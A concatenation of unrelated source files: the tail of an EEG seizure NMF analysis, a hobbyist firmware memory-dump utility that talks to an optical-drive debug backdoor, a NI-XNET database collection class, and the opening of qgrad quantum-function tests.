    lead_sz = np.diff(np.insert(sz_starts, 0, [0])) > (FIXED_PREICTAL_SEC + 60 * 15) # 15 min buffer
    remaining_sz_ids = np.where(lead_sz)[0]
    remove_sz_ids = np.where(~lead_sz)[0]
    print("\tremoving seizures {}".format(remove_sz_ids))
    for remv in remove_sz_ids:
        t_sec = np.delete(t_sec, np.where(sz_id == remv))
        bandpower_data.drop(bandpower_data.index[np.where(sz_id == remv)[0]], inplace=True)
        sz_id.drop(sz_id.index[np.where(sz_id == remv)[0]], inplace=True)
    np.save(ospj(pt_data_path, "remaining_sz_ids.npy"), remaining_sz_ids)
    # Apply NMF to the pre-ictal period of each lead seizure to find
    # components (H) and their expression over time (W).
    n_remaining_sz = np.size(remaining_sz_ids)
    n_components = range(2, 20)
    for sz_idx in tqdm(range(n_remaining_sz)):
        i_sz = remaining_sz_ids[sz_idx]
        data = bandpower_data[sz_id == i_sz]
        # sweep candidate ranks and record the reconstruction error of each
        reconstruction_err = np.zeros(np.size(n_components))
        for ind, i_components in enumerate(n_components):
            model = NMF(n_components=i_components, init='nndsvd', random_state=0, max_iter=1000)
            model.fit_transform(data - np.min(data))
            reconstruction_err[ind] = model.reconstruction_err_
        # the elbow of the error curve gives the optimal rank
        kneedle = KneeLocator(n_components, reconstruction_err, curve="convex", direction="decreasing")
        n_opt_components = kneedle.knee
        model = NMF(n_components=n_opt_components, init='nndsvd', random_state=0, max_iter=1000)
        W = model.fit_transform(data - np.min(data))
        H = model.components_
        np.save(ospj(pt_data_path, "nmf_expression_band-{}_elec-{}_sz-{}.npy".format(band_opt, electrodes_opt, i_sz)), W)
        np.save(ospj(pt_data_path, "nmf_components_band-{}_elec-{}_sz-{}.npy".format(band_opt, electrodes_opt, i_sz)), H)
    np.save(ospj(pt_data_path, "lead_sz_t_sec_band-{}_elec-{}.npy".format(band_opt, electrodes_opt)), t_sec)
    np.save(ospj(pt_data_path, "lead_sz_sz_id_band-{}_elec-{}.npy".format(band_opt, electrodes_opt)), sz_id)
##############################################
# %%
# # States are defined as the max expressed component at each time point
# states = np.argmax(movmean(W[:, 1:].T, k=100).T, axis=-1) + 1
# # take the dissimilarity in states, optionally using fast dynamic time warping
# if DTW_FLAG:
# states_dissim_mat = np.zeros((n_remaining_sz, n_remaining_sz))
# for ind1, i in enumerate(remaining_sz_ids):
# for ind2, j in enumerate(remaining_sz_ids):
# distance, path = fastdtw(states[sz_id == i], states[sz_id == j], dist=euclidean)
# states_dissim_mat[ind1, ind2] = distance
# else:
# # find how long pre-ictal segments are for each sz and take shortest one
# pre_ictal_lengths = np.zeros(remaining_sz_ids.shape, dtype=int)
# for ind, i_sz in enumerate(remaining_sz_ids):
# pre_ictal_lengths[ind] = np.size(states[sz_id == i_sz])
# pre_ictal_length = np.min(pre_ictal_lengths)
# # matrix of adjusted rand score for similar state occurences
# states_dissim_mat = np.zeros((n_remaining_sz, n_remaining_sz))
# for ind1, i in enumerate(remaining_sz_ids):
# for ind2, j in enumerate(remaining_sz_ids):
# rand = adjusted_rand_score(states[sz_id == i][-pre_ictal_length:], states[sz_id == j][-pre_ictal_length:])
# states_dissim_mat[ind1, ind2] = 1 - rand
# np.save(ospj(pt_data_path, "states_dissim_mat_{}.npy".format(mode)), states_dissim_mat)
# np.save(ospj(pt_data_path, "remaining_sz_ids.npy"), remaining_sz_ids)
# # Plot the NMF subgraphs and expression
# if PLOT:
# for i in remaining_sz_ids:
# fig, ax = plt.subplots()
# t_arr_min = (t_sec[sz_id == i] - t_sec[sz_id == i][-1]) / 60
# ax.plot(t_arr_min, movmean(W[sz_id == i, 1:].T, k=100, mode='same').T)
# ax.set_xlabel("Time from seizure onset (min)")
# ax.set_ylabel("Subgraph coefficient")
# ax.set_title("Seizure {}".format(i))
# ax.legend(np.arange(n_components - 1) + 2, title="Component")
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "subgraph_expression_sz_{}_{}.svg".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "subgraph_expression_sz_{}_{}.png".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# ax = plot_spectrogram(H, start_time=0, end_time=n_components)
# ax.set_title("{}".format(pt))
# ax.set_xlabel("Component")
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "subgraphs_{}.svg".format(mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "subgraphs_{}.png".format(mode)), bbox_inches='tight', transparent='true')
# plt.close()
# if PLOT:
# n_electrodes = soz_electrodes.shape[0]
# # plot all states
# component_arr = np.reshape(H, (n_components, -1, n_electrodes))
# # component_z = np.zeros(component_arr.shape)
# # for i_comp in range(n_components):
# # component_z[i_comp, :, :] = zscore(component_arr[i_comp, :, :], axis=1)
# # sort to put non-soz first
# sort_soz_inds = np.argsort(soz_electrodes)
# n_soz = np.sum(soz_electrodes)
# n_non_soz = n_electrodes - n_soz
# for i_comp in range(n_components):
# fig, ax = plt.subplots()
# divider = make_axes_locatable(ax)
# cax = divider.append_axes('right', size='5%', pad=0.05)
# im = ax.imshow(component_arr[i_comp, :, sort_soz_inds].T)
# ax.axvline(n_non_soz - 0.5, c='r', lw=2)
# ax.set_title("Subgraph {}, {}".format(i_comp, pt))
# ax.set_yticks(np.arange(6))
# ax.set_yticklabels([r'$\delta$', r'$\theta$', r'$\alpha$', r'$\beta$', r'low-$\gamma$', r'high-$\gamma$'])
# ax.set_xticks(np.arange(n_electrodes))
# ax.set_xticks([n_non_soz / 2, n_non_soz + n_soz / 2])
# ax.set_xticklabels(["Non SOZ", "SOZ"])
# ax.set_xlabel("Electrodes")
# ax.set_ylabel("Frequency band")
# cbar = fig.colorbar(im, cax=cax, orientation='vertical')
# cbar.ax.set_ylabel('Power (dB)', rotation=90)
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "soz_subgraph_{}_heatmap_{}.svg".format(i_comp, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "soz_subgraph_{}_heatmap_{}.png".format(i_comp, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# # plot soz state expression for all seizures
# for i in remaining_sz_ids:
# fig, ax = plt.subplots()
# t_arr_min = (t_sec[sz_id == i] - t_sec[sz_id == i][-1]) / 60
# ax.plot(t_arr_min, movmean(W[sz_id == i,pt_soz_state].T, k=100).T)
# ax.set_xlabel("Time from seizure onset (min)")
# ax.set_ylabel("SOZ subgraph coefficient")
# ax.set_title("Seizure {}".format(i))
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "soz_expression_sz_{}_{}.svg".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "soz_expression_sz_{}_{}.png".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# break
# # %%
# min_pre_ictal_size = min([W[sz_id == i,pt_soz_state].shape[0] for i in remaining_sz_ids])
# pre_ictal_soz_state = np.zeros((np.size(remaining_sz_ids), min_pre_ictal_size))
# for ind, i_sz in enumerate(remaining_sz_ids):
# pre_ictal_soz_state[ind, :] = W[sz_id == i_sz,pt_soz_state][-min_pre_ictal_size:]
# # %%
# # %%
| 2.53125 | 3 |
backdoor/dump.py | alu96/coastermelt | 0 | 12772936 | #!/usr/bin/env python
import sys, struct, time
# Use on the command line to interactively dump regions of memory.
# Or import as a library for higher level dumping functions.
__all__ = [
'words_from_string',
'poke_words', 'poke_words_from_string', 'poke_bytes',
'read_block', 'scsi_read_buffer',
'hexdump', 'hexdump_words',
'dump', 'dump_words',
'search_block'
]
class progress_reporter:
    """A simple console progress reporter for memory operations.

    Invisible unless the operation takes longer than the reporting
    interval; after that, redraws are throttled to that interval and a
    final status line is always written at completion (if anything was
    printed at all).
    """

    def __init__(self, message, reporting_interval = 0.2, enabled = True):
        self.message = message
        self.reporting_interval = reporting_interval
        self.enabled = enabled
        self.first_timestamp = time.time()
        # Stays None until the first status line is actually written.
        self.output_timestamp = None

    def mandatory_update(self, current, total):
        # Overwrite the current console line and remember when we did so.
        sys.stdout.write("\r %d / %d %s " % (current, total, self.message))
        sys.stdout.flush()
        self.output_timestamp = time.time()

    def update(self, current, total):
        if not self.enabled:
            return
        reference = self.first_timestamp if self.output_timestamp is None else self.output_timestamp
        # Only redraw once the reporting interval has elapsed.
        if time.time() > reference + self.reporting_interval:
            self.mandatory_update(current, total)

    def complete(self, current, total):
        # Emit a final status (plus newline) only if we ever printed anything.
        if self.output_timestamp is not None:
            self.mandatory_update(current, total)
            sys.stdout.write('\n')
            sys.stdout.flush()
def words_from_string(s, padding_byte = chr(255)):
    """Unpack a little-endian string into a tuple of 32-bit integers.

    If the length is not a multiple of four, the string is first padded
    out with `padding_byte` (0xFF by default).
    """
    leftover = len(s) % 4
    if leftover != 0:
        s = s + padding_byte * (4 - leftover)
    word_count = len(s) // 4
    return struct.unpack('<%dI' % word_count, s)
def poke_words_from_string(d, address, s):
    # Convenience wrapper: unpack a little-endian string into words, then poke.
    poke_words(d, address, words_from_string(s))
def poke_words(d, address, words, verbose = True, reporting_interval = 0.1):
    """Send a block of words (slowly)"""
    # One device round trip per word, so this is slow for large blocks.
    progress = progress_reporter('words sent',
        enabled=verbose, reporting_interval=reporting_interval)
    l = len(words)
    for i, w in enumerate(words):
        d.poke(address + 4*i, w)
        progress.update(i+1, l)
    progress.complete(l, l)
def poke_bytes(d, address, bytes, verbose = True, reporting_interval = 0.1):
    """Send a block of bytes (VERY slowly)"""
    # One device round trip per byte — four times slower than poke_words.
    progress = progress_reporter('bytes sent',
        enabled=verbose, reporting_interval=reporting_interval)
    l = len(bytes)
    for i, w in enumerate(bytes):
        d.poke_byte(address + i, w)
        progress.update(i+1, l)
    progress.complete(l, l)
def scsi_read_buffer(d, mode, address, size):
    """Use the SCSI 'Read Buffer' command to grab a block of data quickly.

    The bootloader and TS01 firmware implement a version of this command
    with mode 6 mapped to ARM memory (low 16MB only) and mode 2 mapped
    to something we'll call DMA memory.
    """
    # Build the 12-byte READ BUFFER CDB: opcode 0x3c, mode byte, then
    # 24-bit big-endian address and length fields, padded with zeros.
    return d.scsi_in(''.join(map(chr, [
        0x3c, mode, 0,
        (address >> 16) & 0xff,
        (address >> 8) & 0xff,
        (address >> 0) & 0xff,
        (size >> 16) & 0xff,
        (size >> 8) & 0xff,
        (size >> 0) & 0xff,
        0,0,0 ])), size)
def read_word_aligned_block(d, address, size,
    verbose = True, reporting_interval = 0.2,
    max_round_trips = None, fast = False, addr_space = 'arm'):
    # Implementation detail for read_block
    # Callers must supply a word-aligned address and size.
    assert (address & 3) == 0
    assert (size & 3) == 0
    i = 0
    parts = []
    progress = progress_reporter('bytes read',
        enabled=verbose, reporting_interval=reporting_interval)
    while i < size:
        # Transfer at most 64 kiB per round trip; wordcount is in 32-bit words.
        wordcount = min(size - i, 64*1024) / 4
        # DRAM appears at 0x1c08000 in the ARM address space; this is the
        # corresponding offset into the DMA ('mode 2') space.
        dram_address = (address - 0x1c08000) & 0xffffffff
        if addr_space == 'dma' and hasattr(d, 'scsi_in'):
            # Undocumented SCSI command that reads some kind of DMA memory space.
            # Begins with DRAM, but starts doing other things around 0x368500.
            part = scsi_read_buffer(d, 2, address + i, wordcount * 4)
        elif fast and hasattr(d, 'scsi_in') and addr_space == 'arm' and dram_address + i <= 0x368000:
            # Use the DMA reads, where we can, to implement fast DRAM reads.
            part = scsi_read_buffer(d, 2, address - 0x1c08000 + i, wordcount * 4)
        elif fast and hasattr(d, 'scsi_in') and addr_space == 'arm' and address + i <= 0x200000:
            # Undocumented SCSI command that copies data from flash addresses
            # via the ARM to DRAM and DMA's it out to SCSI. Very fast, handles
            # addresses (including RAM mappings) below 2MB.
            wordcount = min(wordcount, 64 * 1024 / 4)
            part = scsi_read_buffer(d, 6, address + i, wordcount * 4)
        elif addr_space == 'arm':
            # Slow but general path: word reads through the debug backdoor.
            part = d.read_block(address + i, wordcount)
        else:
            raise ValueError("Don't know how to read address %08x in %r memory" % (address, addr_space))
        assert (len(part) & 3) == 0
        i += len(part)
        parts.append(part)
        # Optionally stop early after a bounded number of device commands.
        if max_round_trips and len(parts) >= max_round_trips:
            break
        progress.update(i, size)
    progress.complete(i, size)
    return ''.join(parts)
def read_block(d, address, size, max_round_trips = None, fast = False, addr_space = 'arm'):
    """Read a block of memory, return it as a string.

    Reads using LDR (word-aligned) reads only. The requested block
    does not need to be aligned.

    If max_round_trips is set, we stop after that many round-trip
    commands to the device. This can be used for real-time applications
    where it may be better to have some data soon than all the data later.

    If 'fast' is set, this uses a much faster DMA-based approach that probably
    doesn't work in all cases.
    """
    # Convert to half-open interval [address, end)
    # Round beginning of interval down to nearest word
    # Round end of interval up to nearest word
    end = address + size
    word_address = address & ~3
    word_end = (end + 3) & ~3
    word_size = word_end - word_address
    # Where in the larger interval is our original block?
    sub_begin = address - word_address
    sub_end = sub_begin + size
    # Read the aligned superset, then slice out just the requested bytes.
    return read_word_aligned_block(d, word_address, word_size,
        max_round_trips=max_round_trips, fast=fast, addr_space=addr_space
        )[sub_begin:sub_end]
def search_block(d, address, size, substring,
    context_length = 16, fast = False, addr_space = 'arm'):
    """Read a block of ARM memory, and search for all occurrences of a byte string.

    Yields tuples every time a match is found:
       (address, context_before, context_after)
    """
    # We may have a way to do this gradually later, but for now we read all at once
    # then search all at once.
    block = read_block(d, address, size, fast=fast, addr_space=addr_space)
    offset = 0
    while True:
        offset = block.find(substring, offset)
        if offset < 0:
            break
        yield (
            address + offset,
            block[max(0, offset - context_length):offset],
            block[offset + len(substring):offset + len(substring) + context_length]
        )
        # Advance past this hit so reported matches never overlap.
        offset += len(substring)
def hexdump(src, length = 16, address = 0, log_file = None):
    """Format a classic hex+ASCII dump of `src`; optionally log the raw bytes."""
    if log_file:
        f = open(log_file, 'wb')
        f.write(src)
        f.close()
    # Based on https://gist.github.com/sbz/1080258
    # Table mapping unprintable characters to '.' for the ASCII column.
    FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
    lines = []
    for c in xrange(0, len(src), length):
        chars = src[c:c+length]
        hex = ' '.join(["%02x" % ord(x) for x in chars])
        printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
        lines.append("%08x  %-*s  %s\n" % (address + c, length*3, hex, printable))
    return ''.join(lines)
def hexdump_words(src, words_per_line = 8, address = 0, log_file = None):
    """Format a word-oriented hex dump of `src`; optionally log the raw bytes."""
    if log_file:
        f = open(log_file, 'wb')
        f.write(src)
        f.close()
    # Word dumps require aligned input; see hexdump() for arbitrary bytes.
    assert (address & 3) == 0
    assert (len(src) & 3) == 0
    words = words_from_string(src)
    lines = []
    for c in xrange(0, len(words), words_per_line):
        w = words[c:c+words_per_line]
        hex = ' '.join(["%08x" % i for i in w])
        lines.append("%08x  %-*s\n" % (address + c*4, words_per_line*9, hex))
    return ''.join(lines)
def dump(d, address, size, log_file = 'result.log', fast = False, check_fast = False, addr_space = 'arm'):
    """Read `size` bytes at `address`, hexdump to stdout and log raw bytes."""
    data = read_block(d, address, size, fast=fast, addr_space=addr_space)
    if check_fast:
        # Cross-check: re-read with the opposite fast/slow path and compare.
        assert read_block(d, address, size, fast=not fast, addr_space=addr_space) == data
    sys.stdout.write(hexdump(data, 16, address, log_file))
def dump_words(d, address, wordcount, log_file = 'result.log', fast = False, addr_space = 'arm'):
    """Read `wordcount` 32-bit words at `address` and hexdump them to stdout."""
    data = read_block(d, address, wordcount * 4, fast=fast, addr_space=addr_space)
    sys.stdout.write(hexdump_words(data, 8, address, log_file))
if __name__ == "__main__":
    import remote
    # Command line usage: both arguments are hex, optional '_' separators
    # are stripped (e.g. 0x0001_c000 -> 0x0001c000).
    if len(sys.argv) != 3:
        print "usage: %s address size" % sys.argv[0]
        sys.exit(1)
    dump(remote.Device(),
        int(sys.argv[1].replace('_',''), 16),
        int(sys.argv[2].replace('_',''), 16))
| 3 | 3 |
nixnet/database/_collection.py | ni-ldp/nixnet-python | 16 | 12772937 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import typing # NOQA: F401
import six
from nixnet import _cprops
from nixnet import _funcs
from nixnet import constants # NOQA: F401
from nixnet.database import _database_object # NOQA: F401
class DbCollection(collections.Mapping):
    """Collection of database objects.

    A read-mostly mapping from object name to database object, backed by a
    NI-XNET database reference.  Lookups go through the driver on every
    access; objects are wrapped by the supplied factory.
    """

    def __init__(self, handle, db_type, prop_id, factory):
        # type: (int, constants.ObjectClass, int, typing.Any) -> None
        # handle: driver reference to the parent database object.
        # db_type: object class used when finding/creating children.
        # prop_id: property id of the child-reference array.
        # factory: callable wrapping a raw reference into a database object.
        self._handle = handle
        self._type = db_type
        self._prop_id = prop_id
        self._factory = factory

    def __repr__(self):
        return '{}(handle={}, db_type={})'.format(type(self).__name__, self._handle, self._type)

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            sys_other = typing.cast(DbCollection, other)
            return self._handle == sys_other._handle and self._prop_id == sys_other._prop_id
        else:
            return NotImplemented

    def __ne__(self, other):
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        else:
            return not result

    def __hash__(self):
        # Equal collections share a handle, so hashing on the handle alone is
        # consistent with __eq__ (different prop_ids merely collide).
        return hash(self._handle)

    def __len__(self):
        return _cprops.get_database_ref_array_len(self._handle, self._prop_id)

    def __iter__(self):
        return self.keys()

    def __getitem__(self, index):
        """Return the database object with the given name.

        Args:
            index(str): Name of the database object.

        Returns:
            The database object produced by this collection's factory.
        """
        if isinstance(index, six.string_types):
            ref = _funcs.nxdb_find_object(self._handle, self._type, index)
            return self._factory(_handle=ref)
        else:
            raise TypeError(index)

    def __delitem__(self, index):
        # Delete the named child object from the database.
        # NOTE(review): defined even though the base class is an immutable
        # Mapping — confirm deletion is intended to be part of this API.
        ref = _funcs.nxdb_find_object(self._handle, self._type, index)
        _funcs.nxdb_delete_object(ref)

    def keys(self):
        """Return database object names in the collection.

        Yields:
            An iterator to database object names in the collection.
        """
        for child in self._get_children():
            yield child.name

    def values(self):
        """Return database objects in the collection.

        Yields:
            An iterator to database objects in the collection.
        """
        return self._get_children()

    def items(self):
        """Return all database object names and objects in the collection.

        Yields:
            An iterator to tuple pairs of database object names and objects in the collection
        """
        for child in self._get_children():
            yield child.name, child

    def add(self, name):
        # type: (typing.Text) -> _database_object.DatabaseObject
        """Add a new database object to the collection.

        Args:
            name(str): Name of the new database object.

        Returns:
            ``DatabaseObject``: An instance of the new database object.
        """
        ref = _funcs.nxdb_create_object(self._handle, self._type, name)
        return self._factory(_handle=ref)

    def _get_children(self):
        # Wrap each raw child reference from the driver with the factory.
        for ref in _cprops.get_database_ref_array(self._handle, self._prop_id):
            yield self._factory(_handle=ref)
| 2.046875 | 2 |
qgrad/tests/test_qgrad_qutip.py | quantshah/qgrad | 37 | 12772938 | <reponame>quantshah/qgrad
"""Tests for qgrad implementation of qutip functions"""
from numpy.testing import (
assert_almost_equal,
assert_array_equal,
assert_array_almost_equal,
assert_equal,
assert_raises,
)
from jax import grad
import jax.numpy as jnp
from jax.random import PRNGKey, split, uniform
import pytest
from qutip import rand_ket, rand_dm, rand_herm
import numpy as np
import scipy
from qgrad.qgrad_qutip import (
basis,
coherent,
create,
dag,
Displace,
destroy,
expect,
fidelity,
isbra,
isdm,
isket,
isherm,
_make_rot,
rand_unitary,
rand_ket as qgrad_rand_ket,
rand_dm as qgrad_rand_dm,
to_dm,
sigmax,
sigmay,
sigmaz,
squeeze,
to_dm,
Unitary,
)
def test_fidelity():
    """
    Tests the fidelity function and computation of its gradient
    """
    ket0 = jnp.array([[1.0], [0]])  # represents |0>
    ket1 = jnp.array([[0.0], [1]])  # represents |1>
    ket_plus = 1 / jnp.sqrt(2) * (ket0 + ket1)  # represents |+>
    ket_minus = 1 / jnp.sqrt(2) * (ket0 - ket1)  # represents |->
    ket_complx = rand_ket(2).full()

    # orthogonal states have zero fidelity; identical states have unit fidelity
    assert fidelity(ket0, ket1) == 0.0
    assert fidelity(ket0, ket0) == 1.0
    assert fidelity(ket1, ket1) == 1.0
    assert_almost_equal(fidelity(ket_plus, ket_minus), 0.0)
    # fidelity of random states stays within [0, 1]
    assert fidelity(rand_ket(4).full(), rand_ket(4).full()) <= 1.0
    assert fidelity(rand_ket(10).full(), rand_ket(10).full()) >= 0.0
    assert np.isclose(fidelity(ket_complx, ket_complx), 1.0)
    # |<0|+>|^2 = |<1|+>|^2 = |<0|->|^2 = |<1|->|^2 = 1/2
    assert_almost_equal(fidelity(ket_plus, ket0), 1.0 / 2.0)
    assert_almost_equal(fidelity(ket_plus, ket1), 1.0 / 2.0)
    assert_almost_equal(fidelity(ket0, ket_minus), 1.0 / 2.0)
    assert_almost_equal(fidelity(ket1, ket_minus), 1.0 / 2.0)
def test_fidelity_max_dm():
    """Tests for density matrices with respect to themselves to be equal to 1 (max)"""
    for _ in range(10):
        # NOTE(review): unlike the ket tests below, no .full() here — assumes
        # jnp.asarray can consume a qutip Qobj directly; verify against qutip.
        rho1 = jnp.asarray(rand_dm(25))
        rho2 = jnp.asarray(rand_dm(25))
        assert_almost_equal(fidelity(rho1, rho1), 1.0, decimal=4)
        assert_almost_equal(fidelity(rho2, rho2), 1.0, decimal=4)


def test_fidelity_max_ket():
    """Tests for ket states with respect to themselves to be equal to 1 (max)"""
    for _ in range(10):
        ket1 = jnp.asarray(rand_ket(25))
        ket2 = jnp.asarray(rand_ket(25))
        assert_almost_equal(fidelity(ket1, ket1), 1.0, decimal=6)
        assert_almost_equal(fidelity(ket2, ket2), 1.0, decimal=6)
def test_fidelity_bounded_mixedmixed(tol=1e-7):
    """Tests for boundedness of fidelity among mixed states to be between [0, 1]"""
    for _ in range(10):
        rho1 = jnp.asarray(rand_dm(25))
        rho2 = jnp.asarray(rand_dm(25))
        F = fidelity(rho1, rho2)
        assert -tol <= F <= 1 + tol


def test_fidelity_bounded_puremixed(tol=1e-7):
    """Tests for boundedness of fidelity between pure and mixed states to be between [0, 1]"""
    for _ in range(10):
        rho1 = jnp.asarray(rand_dm(25))
        ket1 = jnp.asarray(rand_ket(25))
        F = fidelity(rho1, ket1)
        assert -tol <= F <= 1 + tol


def test_fidelity_bounded_purepure(tol=1e-7):
    """Tests for boundedness of fidelity among kets to be between [0, 1]"""
    for _ in range(10):
        ket1 = jnp.asarray(rand_ket(25))
        ket2 = jnp.asarray(rand_ket(25))
        F = fidelity(ket1, ket2)
        assert -tol <= F <= 1 + tol
def test_basis():
    """Tests the `basis` method"""
    # basis(4, 2) should be a 4x1 column vector with a single 1 at index 2
    np_arr = np.zeros((4, 1), dtype=np.complex64)
    np_arr[2, 0] = 1.0
    assert np.array_equal(basis(4, 2), jnp.asarray(np_arr))
def test_destroy():
    """Tests the annihilation/destroy/lowering operator"""
    # Destruction operator lowers the bosonic number state: a|9> = 3|8>
    b9 = basis(10, 9)  # Fock/number state with 1 at 9th index
    d10 = destroy(10)  # 10-dimensional destroy operator
    lowered = jnp.dot(d10, b9)
    assert_array_almost_equal(lowered, 3.0 * basis(10, 8))
    # Explicit 3x3 matrix form: superdiagonal entries sqrt(1), sqrt(2)
    d3 = destroy(3)
    matrix3 = jnp.asarray(
        [
            [0.00000000 + 0.0j, 1.00000000 + 0.0j, 0.00000000 + 0.0j],
            [0.00000000 + 0.0j, 0.00000000 + 0.0j, 1.41421356 + 0.0j],
            [0.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
        ]
    )

    assert_equal(np.allclose(matrix3, d3), True)
    # The adjoint of the destroy operator is the create operator.
    assert_equal(np.allclose(dag(destroy(3)), create(3)), True)
def test_create():
    """Tests for the creation operator"""
    # Creation operator raises the number state: a†|3> = 2|4>
    b3 = basis(5, 3)
    c5 = create(5)
    raised = jnp.dot(c5, b3)
    assert_equal(np.allclose(raised, 2.0 * basis(5, 4)), True)
    # Explicit 3x3 matrix form: subdiagonal entries sqrt(1), sqrt(2)
    c3 = create(3)
    matrix3 = jnp.asarray(
        [
            [0.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
            [1.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
            [0.00000000 + 0.0j, 1.41421356 + 0.0j, 0.00000000 + 0.0j],
        ]
    )

    assert_equal(np.allclose(matrix3, c3), True)
def test_sigmax():
    """Pauli-X matrix matches its standard 2x2 form."""
    assert_array_equal(sigmax(), jnp.array([[0.0, 1.0], [1.0, 0.0]]))


def test_sigmay():
    """Pauli-Y matrix matches its standard 2x2 form."""
    assert_array_equal(
        sigmay(), jnp.array([[0.0 + 0.0j, 0.0 - 1.0j], [0.0 + 1.0j, 0.0 + 0.0j]])
    )


def test_sigmaz():
    """Pauli-Z matrix matches its standard 2x2 form."""
    assert_array_equal(sigmaz(), jnp.array([[1.0, 0.0], [0.0, -1.0]]))
@pytest.mark.parametrize("op", [sigmax(), sigmay(), sigmaz()])
@pytest.mark.parametrize("state", [basis(2, 0), basis(2, 1)])
def test_expect_sigmaxyz(op, state):
"""Tests the `expect` function on Pauli-X, Pauli-Y and Pauli-Z."""
# The stacked pytest decorators check all the argument combinations like a Cartesian product
if jnp.all(op != sigmaz()):
assert expect(op, state) == 0.0
elif jnp.all(state == basis(2, 0)):
assert expect(op, state) == 1.0
else:
assert expect(op, state) == -1.0
@pytest.mark.parametrize(
    "oper, state",
    [
        (rand_herm(2).full(), basis(2, 0)),
        (rand_herm(4).full(), basis(4, 0)),
        # NOTE(review): basis(20, 20) addresses the 21st level of a 20-dim
        # space; confirm `basis` tolerates an out-of-range index here.
        (rand_herm(20).full(), basis(20, 20)),
    ],
)
def test_expect_herm(oper, state):
    """Tests that the expectation value of a hermitian operator is real and that of
    the non-hermitian operator is complex"""
    # NOTE(review): only the Hermitian (real expectation) half of the
    # docstring is actually exercised below.
    assert jnp.imag(expect(oper, state)) == 0.0
@pytest.mark.parametrize(
    "oper, state",
    [
        (rand_herm(5).full(), rand_ket(5).full()),
        (rand_dm(5).full(), rand_ket(5).full()),
    ],
)
def test_expect_dag(oper, state):
    r"""Reconciles the expectation value of a random operator with the analytic calculation
    .. math:: <A> = <\psi|A|\psi>
    """
    # Direct sandwich product <psi|A|psi> used as the reference value.
    expected = jnp.dot(jnp.dot(dag(state), oper), state)
    assert abs(expect(oper, state) - expected) < 1e-6
def test_coherent():
    """A coherent state satisfies <a> = alpha, and alpha = 0 gives the vacuum."""
    alpha = 0.5
    assert abs(expect(destroy(10), coherent(10, alpha)) - alpha) < 1e-4
    # Border case: alpha = 0 must reduce to the ground/vacuum state |0>
    for dim in range(2, 30, 5):
        assert_array_almost_equal(coherent(dim, 0), basis(dim, 0))
def test_dag_ket():
    r"""Tests the dagger operation :math:`A^{\dagger}` on operator :math:`A`"""
    # test with all real entries: dag of a ket is the corresponding bra (row vector)
    assert_array_equal(dag(basis(2, 0)), [[1.0, 0.0]])
    assert_array_equal(dag(basis(2, 1)), [[0.0, 1.0]])
    # test with all complex entries: dag must transpose AND conjugate
    ket1 = jnp.array(
        [
            [0.04896761 + 0.18014458j],
            [0.6698803 + 0.13728367j],
            [-0.07598839 + 0.38113445j],
            [-0.00505985 + 0.10700243j],
            [-0.18735261 + 0.5476768j],
        ],
        dtype=jnp.complex64,
    )
    # Expected result: same entries conjugated, laid out as a 1x5 row.
    ket1_dag = jnp.array(
        [
            [
                0.04896761 - 0.18014458j,
                0.6698803 - 0.13728367j,
                -0.07598839 - 0.38113445j,
                -0.00505985 - 0.10700243j,
                -0.18735261 - 0.5476768j,
            ]
        ],
        dtype=jnp.complex64,
    )
    assert_array_equal(dag(ket1), ket1_dag)
@pytest.mark.repeat(10)
def test_dag_dot():
    """A normalized random ket satisfies <psi|psi> = 1."""
    dim = np.random.randint(3, 10)
    psi = rand_ket(dim).full()
    assert_almost_equal(jnp.dot(dag(psi), psi), 1.0)
def test_isket():
    """Tests the `isket` method to see whether a state is a ket based on its shape"""
    # Use bare truthiness asserts instead of `== True` / `== False` (E712).
    for dim in range(2, 6):
        assert isket(rand_ket(dim).full())  # kets are (N, 1)
        assert not isket(dag(rand_ket(dim).full()))  # bras are (1, N)
        assert not isket(rand_dm(dim).full())  # density matrices are (N, N)
def test_isbra():
    """Tests the `isbra` method to see whether a state is a bra based on its shape"""
    # Use bare truthiness asserts instead of `== True` / `== False` (E712).
    for dim in range(2, 6):
        assert not isbra(rand_ket(dim).full())  # kets are (N, 1)
        assert isbra(dag(rand_ket(dim).full()))  # bras are (1, N)
        assert not isbra(rand_dm(dim).full())  # density matrices are (N, N)
def test_to_dm():
    """Tests the `to_dm` method that converts kets and bras to density matrices"""
    # |0><0| and |1><1| projectors used as references
    dm0 = jnp.array(
        [[1.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 0.0 + 0.0j]], dtype=jnp.complex64
    )
    dm1 = jnp.array(
        [[0.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 1.0 + 0.0j]], dtype=jnp.complex64
    )
    # testing kets
    assert_array_equal(to_dm(basis(2, 0)), dm0)
    assert_array_equal(to_dm(basis(2, 1)), dm1)
    # testing bras: <i| must map to the same projector as |i>
    assert_array_equal(to_dm(dag(basis(2, 0))), dm0)
    assert_array_equal(to_dm(dag(basis(2, 1))), dm1)
def test_squeeze():
    """Tests the squeeze operator against a precomputed 4x4 reference matrix."""
    # S(z) with z = 0.1 + 0.1j; reference values precomputed externally.
    sq = squeeze(4, 0.1 + 0.1j)
    sqmatrix = jnp.array(
        [
            [
                0.99500417 + 0.0j,
                0.00000000 + 0.0j,
                0.07059289 - 0.07059289j,
                0.00000000 + 0.0j,
            ],
            [
                0.00000000 + 0.0j,
                0.98503746 + 0.0j,
